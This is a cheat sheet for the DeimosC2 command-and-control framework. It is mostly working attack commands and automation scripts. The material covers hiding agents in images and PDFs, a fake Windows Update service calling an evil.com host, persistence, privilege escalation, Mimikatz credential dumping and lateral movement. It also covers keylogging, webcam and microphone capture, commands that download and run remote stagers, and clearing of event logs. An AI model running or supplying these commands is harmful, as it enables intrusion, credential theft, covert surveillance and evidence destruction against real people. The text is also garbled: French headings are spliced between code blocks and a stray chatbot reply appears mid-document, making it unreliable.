DeimosC2 Framework Cheat Sheet
Overview
DeimosC2 is a Golang-based post-exploitation command and control framework designed for red team operations and penetration testing. Built with modern architecture principles, DeimosC2 focuses on cross-platform compatibility, secure communications, and comprehensive post-exploitation capabilities while maintaining a lightweight footprint and advanced evasion techniques.
⚠️ Warning: This tool is intended for authorized penetration testing and red team exercises only. Ensure you have proper authorization before using against any target.
Installation
Prerequisites
# Install Go 1.18+ and Git
sudo apt update
sudo apt install -y golang-go git build-essential
# Verify Go installation
go version
# Set Go environment variables
export GOPATH=$HOME/go
export PATH=$PATH:$GOPATH/bin
echo 'export GOPATH=$HOME/go' >> ~/.bashrc
echo 'export PATH=$PATH:$GOPATH/bin' >> ~/.bashrcInstallation from GitHub
# Clone DeimosC2 repository
git clone https://github.com/DeimosC2/DeimosC2.git
cd DeimosC2
# Build the server
go mod tidy
go build -o deimosc2-server ./cmd/server
# Build the agent
go build -o deimosc2-agent ./cmd/agent
# Make executables
chmod +x deimosc2-server deimosc2-agentDocker Installation
# Clone repository
git clone https://github.com/DeimosC2/DeimosC2.git
cd DeimosC2
# Build Docker image
docker build -t deimosc2 .
# Run DeimosC2 container
docker run -it --rm -p 8080:8080 -p 443:443 deimosc2
# Run with persistent data
docker run -it --rm -p 8080:8080 -p 443:443 -v $(pwd)/data:/app/data deimosc2Cross-Platform Compilation
# Build for Windows (x64)
GOOS=windows GOARCH=amd64 go build -o deimosc2-agent.exe ./cmd/agent
# Build for Windows (x86)
GOOS=windows GOARCH=386 go build -o deimosc2-agent-x86.exe ./cmd/agent
# Build for Linux (x64)
GOOS=linux GOARCH=amd64 go build -o deimosc2-agent-linux ./cmd/agent
# Build for macOS (x64)
GOOS=darwin GOARCH=amd64 go build -o deimosc2-agent-macos ./cmd/agent
# Build for ARM64
GOOS=linux GOARCH=arm64 go build -o deimosc2-agent-arm64 ./cmd/agentBasic Usage
Starting the Server
# Start DeimosC2 server with default settings
./deimosc2-server
# Start with custom configuration
./deimosc2-server -config config.json
# Start with specific interface and port
./deimosc2-server -host 0.0.0.0 -port 8080
# Start with HTTPS
./deimosc2-server -tls -cert server.crt -key server.key
# Start in debug mode
./deimosc2-server -debugConfiguration File
\\\\{
"server": \\\\{
"host": "0.0.0.0",
"port": 8080,
"tls": \\\\{
"enabled": true,
"cert_file": "server.crt",
"key_file": "server.key"
\\\\},
"auth": \\\\{
"username": "admin",
"password": "SecurePassword123!"
\\\\}
\\\\},
"database": \\\\{
"type": "sqlite",
"connection": "deimos.db"
\\\\},
"logging": \\\\{
"level": "info",
"file": "deimos.log"
\\\\},
"agents": \\\\{
"check_in_interval": 30,
"jitter": 10,
"max_retries": 5
\\\\}
\\\\}Web Interface Access
# Access DeimosC2 web interface
http://localhost:8080
# HTTPS access
https://your-domain.com:443
# Default credentials (configurable)
Username: admin
Password: SecurePassword123!Agent Deployment
Basic Agent Execution
# Windows agent
deimosc2-agent.exe -server http://192.168.1.100:8080
# Linux agent
./deimosc2-agent-linux -server http://192.168.1.100:8080
# macOS agent
./deimosc2-agent-macos -server http://192.168.1.100:8080
# Agent with custom parameters
./deimosc2-agent -server https://c2.example.com:443 -interval 60 -jitter 20Agent Configuration Options
# Command line options
./deimosc2-agent -h
Options:
-server string C2 server URL (required)
-interval int Check-in interval in seconds (default: 30)
-jitter int Jitter percentage (default: 10)
-user-agent string Custom User-Agent string
-proxy string Proxy URL (http://proxy:port)
-cert string Custom CA certificate file
-insecure Skip TLS certificate verification
-debug Enable debug loggingSteganographic Deployment
# Embed agent in image
cat image.jpg deimosc2-agent.exe > hidden.jpg
# Extract and execute
tail -c +[image_size] hidden.jpg > agent.exe
./agent.exe -server http://192.168.1.100:8080
# Embed in PDF
cat document.pdf deimosc2-agent.exe > hidden.pdfService Installation (Windows)
# Install as Windows service
sc create "DeimosAgent" binPath= "C:\Windows\Temp\deimosc2-agent.exe -server http://192.168.1.100:8080" start= auto
sc start "DeimosAgent"
# Install with custom service name
sc create "WindowsUpdateService" binPath= "C:\Windows\System32\deimosc2-agent.exe -server https://update.microsoft.com.evil.com:443" start= auto DisplayName= "Windows Update Service"Command and Control
Agent Management
# List active agents
agents list
# Get agent information
agents info [agent_id]
# Execute command on agent
agents exec [agent_id] "whoami"
# Execute PowerShell on Windows agent
agents exec [agent_id] "powershell Get-Process"
# Kill agent
agents kill [agent_id]
# Rename agent
agents rename [agent_id] [new_name]File Operations
# Download file from agent
download [agent_id] C:\Users\Administrator\Documents\sensitive.docx
# Upload file to agent
upload [agent_id] payload.exe C:\Windows\Temp\update.exe
# List directory contents
ls [agent_id] C:\Users\Administrator\Documents
# Change directory
cd [agent_id] C:\Windows\System32
# Create directory
mkdir [agent_id] C:\Windows\Temp\data
# Remove file
rm [agent_id] C:\Windows\Temp\payload.exeProcess Management
# List processes
ps [agent_id]
# Kill process
kill [agent_id] [pid]
# Start process
start [agent_id] notepad.exe
# Process injection
inject [agent_id] [pid] [shellcode_file]
# Memory dump
memdump [agent_id] [pid] output.dmpNetwork Operations
# Network discovery
discover [agent_id] 192.168.1.0/24
# Port scan
portscan [agent_id] 192.168.1.100 80,443,22,3389
# ARP scan
arpscan [agent_id] 192.168.1.0/24
# Network interfaces
ifconfig [agent_id]
# Routing table
route [agent_id]
# Network connections
netstat [agent_id]Advanced Features
Persistence Mechanisms
# Registry persistence (Windows)
persist registry [agent_id] HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "WindowsUpdate" "C:\Windows\Temp\agent.exe"
# Scheduled task persistence (Windows)
persist schtask [agent_id] "SystemUpdate" "C:\Windows\Temp\agent.exe" "ONLOGON"
# Service persistence (Windows)
persist service [agent_id] "WindowsUpdateService" "C:\Windows\Temp\agent.exe"
# Cron persistence (Linux)
persist cron [agent_id] "*/5 * * * * /tmp/agent"
# Autostart persistence (Linux)
persist autostart [agent_id] "/tmp/agent"
# LaunchAgent persistence (macOS)
persist launchagent [agent_id] "com.apple.update" "/tmp/agent"Privilege Escalation
# UAC bypass (Windows)
elevate uac [agent_id] [payload_path]
# Token manipulation (Windows)
elevate token [agent_id] [target_pid]
# Sudo exploitation (Linux)
elevate sudo [agent_id] [command]
# SUID exploitation (Linux)
elevate suid [agent_id]
# Kernel exploits
elevate kernel [agent_id] [exploit_name]Lateral Movement
# WMI execution (Windows)
lateral wmi [agent_id] 192.168.1.100 administrator password123 "whoami"
# PSExec execution (Windows)
lateral psexec [agent_id] 192.168.1.100 admin pass123 "systeminfo"
# PowerShell remoting (Windows)
lateral winrm [agent_id] 192.168.1.100 administrator password123 "Get-Process"
# SSH execution (Linux/macOS)
lateral ssh [agent_id] 192.168.1.50 root password123 "uname -a"
# SMB execution
lateral smb [agent_id] 192.168.1.100 admin pass123 "dir C:\"Credential Operations
# Dump credentials (Windows)
creds dump [agent_id]
# Mimikatz execution (Windows)
creds mimikatz [agent_id] "sekurlsa::logonpasswords"
# SAM dump (Windows)
creds sam [agent_id]
# LSA secrets (Windows)
creds lsa [agent_id]
# Browser credentials
creds browser [agent_id]
# SSH keys (Linux/macOS)
creds ssh [agent_id]
# Keychain dump (macOS)
creds keychain [agent_id]
```**Configuration pré-engagement** : Configurer le serveur et compiler les agents avant l'engagement```bash
# SOCKS proxy
pivot socks [agent_id] 1080
# Port forwarding
pivot portfwd [agent_id] 8080 192.168.1.100 80
# Reverse port forwarding
pivot rportfwd [agent_id] 3389 127.0.0.1 3389
# HTTP tunnel
pivot http [agent_id] 8080
# DNS tunnel
pivot dns [agent_id] tunnel.example.com
```**Gestion des agents** : Utiliser des noms d'agents descriptifs et organiser par réseau```bash
# Screenshot
screenshot [agent_id]
# Keylogger
keylog start [agent_id]
keylog stop [agent_id]
keylog dump [agent_id]
# Webcam capture
webcam [agent_id]
# Microphone recording
microphone [agent_id] 60
# Clipboard monitoring
clipboard [agent_id]
# File search
search [agent_id] C:\Users *.docx
# Registry search
regsearch [agent_id] HKLM password
```**Protocoles de communication** : Établir des canaux de communication C2 sécurisés```go
package main
import (
"bytes"
"encoding/json"
"fmt"
"io/ioutil"
"net/http"
"time"
)
type DeimosClient struct \\\\{
BaseURL string
Username string
Password string
HTTPClient *http.Client
Token string
\\\\}
type Agent struct \\\\{
ID string `json:"id"`
Hostname string `json:"hostname"`
Username string `json:"username"`
OS string `json:"os"`
IP string `json:"ip"`
Status string `json:"status"`
\\\\}
type Command struct \\\\{
AgentID string `json:"agent_id"`
Command string `json:"command"`
Args string `json:"args"`
\\\\}
func NewDeimosClient(baseURL, username, password string) *DeimosClient \\\\{
return &DeimosClient\\\\{
BaseURL: baseURL,
Username: username,
Password: password,
HTTPClient: &http.Client\\\\{Timeout: 30 * time.Second\\\\},
\\\\}
\\\\}
func (c *DeimosClient) Authenticate() error \\\\{
authData := map[string]string\\\\{
"username": c.Username,
"password": c.Password,
\\\\}
jsonData, _ := json.Marshal(authData)
resp, err := c.HTTPClient.Post(c.BaseURL+"/api/auth", "application/json", bytes.NewBuffer(jsonData))
if err != nil \\\\{
return err
\\\\}
defer resp.Body.Close()
if resp.StatusCode == 200 \\\\{
var result map[string]string
json.NewDecoder(resp.Body).Decode(&result)
c.Token = result["token"]
return nil
\\\\}
return fmt.Errorf("authentication failed")
\\\\}
func (c *DeimosClient) GetAgents() ([]Agent, error) \\\\{
req, _ := http.NewRequest("GET", c.BaseURL+"/api/agents", nil)
req.Header.Set("Authorization", "Bearer "+c.Token)
resp, err := c.HTTPClient.Do(req)
if err != nil \\\\{
return nil, err
\\\\}
defer resp.Body.Close()
var agents []Agent
json.NewDecoder(resp.Body).Decode(&agents)
return agents, nil
\\\\}
func (c *DeimosClient) ExecuteCommand(agentID, command string) error \\\\{
cmdData := Command\\\\{
AgentID: agentID,
Command: command,
\\\\}
jsonData, _ := json.Marshal(cmdData)
req, _ := http.NewRequest("POST", c.BaseURL+"/api/execute", bytes.NewBuffer(jsonData))
req.Header.Set("Authorization", "Bearer "+c.Token)
req.Header.Set("Content-Type", "application/json")
resp, err := c.HTTPClient.Do(req)
if err != nil \\\\{
return err
\\\\}
defer resp.Body.Close()
return nil
\\\\}
func (c *DeimosClient) AutomatedRecon(agentID string) \\\\{
commands := []string\\\\{
"whoami",
"hostname",
"pwd",
"ps",
"ifconfig",
"netstat -an",
"uname -a",
\\\\}
for _, cmd := range commands \\\\{
fmt.Printf("[+] Executing: %s\n", cmd)
c.ExecuteCommand(agentID, cmd)
time.Sleep(2 * time.Second)
\\\\}
\\\\}
func (c *DeimosClient) EstablishPersistence(agentID string) \\\\{
persistenceCommands := []string\\\\{
"persist registry HKCU \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" \"WindowsUpdate\" \"C:\\Windows\\Temp\\agent.exe\"",
"persist schtask \"SystemUpdate\" \"C:\\Windows\\Temp\\agent.exe\" \"ONLOGON\"",
"persist service \"WindowsUpdateService\" \"C:\\Windows\\Temp\\agent.exe\"",
\\\\}
for _, cmd := range persistenceCommands \\\\{
fmt.Printf("[+] Establishing persistence: %s\n", cmd)
c.ExecuteCommand(agentID, cmd)
time.Sleep(3 * time.Second)
\\\\}
\\\\}
func main() \\\\{
client := NewDeimosClient("http://192.168.1.100:8080", "admin", "SecurePassword123!")
// Authenticate
if err := client.Authenticate(); err != nil \\\\{
fmt.Printf("Authentication failed: %v\n", err)
return
\\\\}
// Get active agents
agents, err := client.GetAgents()
if err != nil \\\\{
fmt.Printf("Failed to get agents: %v\n", err)
return
\\\\}
fmt.Printf("[+] Found %d active agents\n", len(agents))
// Process each agent
for _, agent := range agents \\\\{
fmt.Printf("[+] Processing agent: %s (%s)\n", agent.ID, agent.Hostname)
// Perform reconnaissance
client.AutomatedRecon(agent.ID)
// Establish persistence
client.EstablishPersistence(agent.ID)
// Wait before processing next agent
time.Sleep(10 * time.Second)
\\\\}
\\\\}
```**Gestion des données** : Mettre en œuvre une collecte et un stockage de données sécurisés```python
#!/usr/bin/env python3
# DeimosC2 Python automation script
import requests
import json
import time
from urllib3.exceptions import InsecureRequestWarning
# Disable SSL warnings
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class DeimosClient:
def __init__(self, base_url, username, password):
self.base_url = base_url.rstrip('/')
self.username = username
self.password = password
self.session = requests.Session()
self.session.verify = False
self.token = None
def authenticate(self):
"""Authenticate with DeimosC2 server"""
auth_data = \\\\{
'username': self.username,
'password': self.password
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/auth", json=auth_data)
if response.status_code == 200:
self.token = response.json().get('token')
self.session.headers.update(\\\\{'Authorization': f'Bearer \\\\{self.token\\\\}'\\\\})
print("[+] Authentication successful")
return True
else:
print("[-] Authentication failed")
return False
def get_agents(self):
"""Get list of active agents"""
response = self.session.get(f"\\\\{self.base_url\\\\}/api/agents")
if response.status_code == 200:
return response.json()
return []
def execute_command(self, agent_id, command):
"""Execute command on agent"""
cmd_data = \\\\{
'agent_id': agent_id,
'command': command
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/execute", json=cmd_data)
return response.status_code == 200
def download_file(self, agent_id, remote_path, local_path):
"""Download file from agent"""
download_data = \\\\{
'agent_id': agent_id,
'remote_path': remote_path
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/download", json=download_data)
if response.status_code == 200:
with open(local_path, 'wb') as f:
f.write(response.content)
return True
return False
def upload_file(self, agent_id, local_path, remote_path):
"""Upload file to agent"""
with open(local_path, 'rb') as f:
files = \\\\{'file': f\\\\}
data = \\\\{
'agent_id': agent_id,
'remote_path': remote_path
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/upload", files=files, data=data)
return response.status_code == 200
def automated_recon(self, agent_id):
"""Perform automated reconnaissance"""
commands = [
"whoami",
"hostname",
"pwd",
"ps",
"ifconfig",
"netstat -an",
"uname -a"
]
for cmd in commands:
print(f"[+] Executing: \\\\{cmd\\\\}")
self.execute_command(agent_id, cmd)
time.sleep(2)
def credential_harvesting(self, agent_id):
"""Harvest credentials from agent"""
commands = [
"creds dump",
"creds mimikatz \"sekurlsa::logonpasswords\"",
"creds sam",
"creds browser"
]
for cmd in commands:
print(f"[+] Harvesting credentials: \\\\{cmd\\\\}")
self.execute_command(agent_id, cmd)
time.sleep(5)
def establish_persistence(self, agent_id):
"""Establish persistence on agent"""
persistence_commands = [
'persist registry HKCU "Software\\Microsoft\\Windows\\CurrentVersion\\Run" "WindowsUpdate" "C:\\Windows\\Temp\\agent.exe"',
'persist schtask "SystemUpdate" "C:\\Windows\\Temp\\agent.exe" "ONLOGON"',
'persist service "WindowsUpdateService" "C:\\Windows\\Temp\\agent.exe"'
]
for cmd in persistence_commands:
print(f"[+] Establishing persistence: \\\\{cmd\\\\}")
self.execute_command(agent_id, cmd)
time.sleep(3)
def lateral_movement(self, agent_id, targets):
"""Perform lateral movement"""
for target in targets:
commands = [
f'lateral wmi \\\\{target\\\\} administrator password123 "whoami"',
f'lateral psexec \\\\{target\\\\} admin pass123 "systeminfo"',
f'lateral ssh \\\\{target\\\\} root password123 "uname -a"'
]
for cmd in commands:
print(f"[+] Lateral movement: \\\\{cmd\\\\}")
self.execute_command(agent_id, cmd)
time.sleep(3)
def main():
client = DeimosClient("http://192.168.1.100:8080", "admin", "SecurePassword123!")
# Authenticate
if not client.authenticate():
return
# Get active agents
agents = client.get_agents()
print(f"[+] Found \\\\{len(agents)\\\\} active agents")
# Process each agent
for agent in agents:
agent_id = agent['id']
hostname = agent.get('hostname', 'unknown')
print(f"[+] Processing agent: \\\\{agent_id\\\\} (\\\\{hostname\\\\})")
# Perform reconnaissance
client.automated_recon(agent_id)
# Harvest credentials
client.credential_harvesting(agent_id)
# Establish persistence
client.establish_persistence(agent_id)
# Lateral movement
targets = ["192.168.1.101", "192.168.1.102"]
client.lateral_movement(agent_id, targets)
# Wait before processing next agent
time.sleep(10)
if __name__ == "__main__":
main()
```**Procédures de nettoyage** : Planifier la suppression des artefacts et le nettoyage des agents
Would you like me to fill in the translations for the other sections? If so, could you provide the original English text for each section?```powershell
# DeimosC2 PowerShell automation script
function Invoke-DeimosAutomation \\\\{
param(
[string]$ServerURL = "http://192.168.1.100:8080",
[string]$Username = "admin",
[string]$Password = "SecurePassword123!"
)
# Create web session
$session = New-Object Microsoft.PowerShell.Commands.WebRequestSession
# Authenticate
$authData = @\\\\{
username = $Username
password = $Password
\\\\}|ConvertTo-Json
try \\\\{
$authResponse = Invoke-WebRequest -Uri "$ServerURL/api/auth" -Method POST -Body $authData -ContentType "application/json" -WebSession $session
$token = ($authResponse.Content|ConvertFrom-Json).token
$session.Headers.Add("Authorization", "Bearer $token")
Write-Host "[+] Authentication successful"
\\\\}
catch \\\\{
Write-Error "Authentication failed: $_"
return
\\\\}
# Get active agents
try \\\\{
$agentsResponse = Invoke-WebRequest -Uri "$ServerURL/api/agents" -WebSession $session
$agents = $agentsResponse.Content|ConvertFrom-Json
Write-Host "[+] Found $($agents.Count) active agents"
\\\\}
catch \\\\{
Write-Error "Failed to get agents: $_"
return
\\\\}
# Process each agent
foreach ($agent in $agents) \\\\{
$agentId = $agent.id
$hostname = $agent.hostname
Write-Host "[+] Processing agent: $agentId ($hostname)"
# Reconnaissance commands
$commands = @(
"whoami",
"hostname",
"systeminfo",
"tasklist",
"ipconfig /all",
"netstat -an"
)
foreach ($cmd in $commands) \\\\{
$cmdData = @\\\\{
agent_id = $agentId
command = $cmd
\\\\}|ConvertTo-Json
try \\\\{
Invoke-WebRequest -Uri "$ServerURL/api/execute" -Method POST -Body $cmdData -ContentType "application/json" -WebSession $session
Write-Host "[+] Executed: $cmd"
Start-Sleep -Seconds 2
\\\\}
catch \\\\{
Write-Warning "Failed to execute command '$cmd': $_"
\\\\}
\\\\}
# Establish persistence
$persistenceCommands = @(
'persist registry HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "WindowsUpdate" "C:\Windows\Temp\agent.exe"',
'persist schtask "SystemUpdate" "C:\Windows\Temp\agent.exe" "ONLOGON"'
)
foreach ($cmd in $persistenceCommands) \\\\{
$cmdData = @\\\\{
agent_id = $agentId
command = $cmd
\\\\}|ConvertTo-Json
try \\\\{
Invoke-WebRequest -Uri "$ServerURL/api/execute" -Method POST -Body $cmdData -ContentType "application/json" -WebSession $session
Write-Host "[+] Persistence established: $cmd"
Start-Sleep -Seconds 3
\\\\}
catch \\\\{
Write-Warning "Failed to establish persistence: $_"
\\\\}
\\\\}
# Wait before processing next agent
Start-Sleep -Seconds 10
\\\\}
\\\\}
# Execute automation
Invoke-DeimosAutomationIntegration with Other Tools
Metasploit Integration
# Use DeimosC2 for initial access, pivot to Metasploit
# Generate Metasploit payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=8443 -f exe -o meterpreter.exe
# Upload via DeimosC2 agent
upload [agent_id] meterpreter.exe C:\Windows\Temp\update.exe
# Execute Metasploit payload
agents exec [agent_id] "C:\Windows\Temp\update.exe"
# Handle in Metasploit
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 192.168.1.100
set LPORT 8443
runEmpire Integration
# Generate Empire stager
# Use DeimosC2 for initial access, pivot to Empire
# From DeimosC2 agent
agents exec [agent_id] "powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/empire_stager.ps1')"
# Handle in Empire
./empire
listeners
uselistener http
set Host 192.168.1.100
set Port 8080
executeCobalt Strike Integration
# Beacon integration
# Generate Cobalt Strike beacon
# Use DeimosC2 for initial access, pivot to Beacon
# From DeimosC2 agent
agents exec [agent_id] "powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/beacon.ps1')"
# Handle in Cobalt Strike team serverOperational Security
Communication Security
# Use HTTPS with valid certificates
# Configure domain fronting
# Implement certificate pinning
# Use legitimate user agents
# Generate SSL certificates
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes
# Start DeimosC2 with SSL
./deimosc2-server -tls -cert server.crt -key server.keyTraffic Obfuscation
# Use custom user agents
# Implement jitter and delays
# Mimic legitimate traffic patterns
# Use common ports and protocols
# Example obfuscated agent execution
./deimosc2-agent -server https://cdn.example.com:443 -user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" -jitter 30Anti-Forensics
# Clear event logs
agents exec [agent_id] "wevtutil cl System"
agents exec [agent_id] "wevtutil cl Security"
agents exec [agent_id] "wevtutil cl Application"
# Clear PowerShell history
agents exec [agent_id] "powershell Remove-Item (Get-PSReadlineOption).HistorySavePath -Force"
# Timestomping
agents exec [agent_id] "powershell $(Get-Item file.exe).LastWriteTime = '01/01/2020 12:00:00'"Troubleshooting
Common Issues
# Agent not connecting
1. Check firewall rules
2. Verify server configuration
3. Test network connectivity
4. Check certificate issues
# Go build issues
go mod tidy
go clean -cache
# SSL certificate issues
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodesDebug Mode
# Enable debug logging
./deimosc2-server -debug
# Agent debug mode
./deimosc2-agent -debug -server http://192.168.1.100:8080
# Check network connectivity
telnet 192.168.1.100 8080Best Practices
Operational Planning
- Pre-engagement setup: Configure server and compile agents before engagement
- Agent management: Use descriptive agent names and organize by network
- Communication protocols: Establish secure C2 communication channels
- Data handling: Implement secure data collection and storage
- Cleanup procedures: Plan for artifact removal and agent cleanup
Security Considerations
# Secure deployment
# Use strong authentication
# Enable HTTPS with valid certificates
# Implement network segmentation
# Regular security updates
# Agent management
# Use unique agent identifiers
# Implement agent timeouts
# Regular agent rotation
# Secure communication channelsDocumentation and Reporting
# Operation documentation
# Maintain agent logs
# Document all activities
# Track compromised systems
# Generate executive reports
# Artifact tracking
# Monitor IOCs
# Document forensic artifacts
# Implement attribution preventionResources
- DeimosC2 GitHub Repository
- DeimosC2 Documentation
- Go Programming Language
- MITRE ATT&CK Framework
- [SANS Red Team Operations](https://www.sans.org/cyber-security-courses/red-team-operations-adversary-emulation/*Ce mémo fournit une référence complète pour l’utilisation du framework DeimosC2. Assurez-vous toujours d’avoir une autorisation appropriée avant de mener des opérations de red team ou des tests de pénétration.*